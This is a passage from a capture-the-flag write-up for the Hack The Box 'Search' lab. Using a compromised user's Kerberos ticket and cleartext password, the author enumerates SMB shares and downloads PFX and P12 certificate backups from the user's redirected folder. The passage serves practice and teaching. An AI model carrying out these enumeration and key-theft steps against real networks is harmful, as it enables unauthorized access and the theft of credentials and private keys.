sierra.frye Session
Checking for SMB access level of the sierra.frye user after compromising the account
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=sierra.frye@research.search.htb.ccache crackmapexec smb research.search.htb -k --use-kcache --kdcHost research.search.htb --shares
smb research.search.htb 445 research [*] windows 10.0 build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB research.search.htb 445 RESEARCH [+] search.htb\ from ccache
SMB research.search.htb 445 RESEARCH [+] Enumerated shares
SMB research.search.htb 445 RESEARCH Share Permissions Remark
SMB research.search.htb 445 RESEARCH ----- ----------- ------
SMB research.search.htb 445 RESEARCH ADMIN$ Remote Admin
SMB research.search.htb 445 RESEARCH C$ Default share
SMB research.search.htb 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB research.search.htb 445 RESEARCH helpdesk
SMB research.search.htb 445 RESEARCH IPC$ READ Remote IPC
SMB research.search.htb 445 RESEARCH NETLOGON READ Logon server share
SMB research.search.htb 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB research.search.htb 445 RESEARCH SYSVOL READ Logon server share The sierra.frye user doesn’t appear to have any special or unique access
I will still check the home directory of the user
//research.search.htb/RedirectedFolders$
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=sierra.frye@research.search.htb.ccache impacket-smbclient SEARCH.HTB/@research.search.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use RedirectedFolders$
# cd sierra.frye
# tree .
/sierra.frye/user.txt
/sierra.frye/Desktop/$RECYCLE.BIN
/sierra.frye/Desktop/desktop.ini
/sierra.frye/Desktop/Microsoft Edge.lnk
/sierra.frye/Desktop/user.txt
/sierra.frye/Documents/$RECYCLE.BIN
/sierra.frye/Documents/desktop.ini
/sierra.frye/Downloads/$RECYCLE.BIN
/sierra.frye/Downloads/Backups
/sierra.frye/Downloads/desktop.ini
/sierra.frye/Desktop/$RECYCLE.BIN/desktop.ini
/sierra.frye/Documents/$RECYCLE.BIN/desktop.ini
/sierra.frye/Downloads/$RECYCLE.BIN/desktop.ini
/sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12
/sierra.frye/Downloads/Backups/staff.pfx
Finished - 17 files and foldersThere is an interesting directory named, Backups, which contains a PFX file and a P12 file
PFX/P12
PFX (Personal Information Exchange) and P12 are extensions of PKCS #12, which is a container format that holds a private key and its associated digital certificate. They are often used for securely storing and transporting cryptographic information, such as in SSL/TLS protocols.
┌──(kali㉿kali)-[~/…/labs/search/smb/RedirectedFolders$]
└─$ smbget --recursive smb://research.search.htb/RedirectedFolders$/sierra.frye -U 'SEARCH.HTB/sierra.frye'
password for [search.htb\sierra.frye]: $$49=wide=STRAIGHT=jordan=28$$18
using domain: SEARCH.HTB, user: sierra.frye
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/$RECYCLE.BIN/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/Microsoft Edge.lnk
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/user.txt
smb://research.search.htb/RedirectedFolders$/sierra.frye/Documents/$RECYCLE.BIN/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Documents/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/$RECYCLE.BIN/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/Backups/staff.pfx
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/user.txt
Downloaded 9.61kB in 5 secondsDownloading them to Kali for further analysis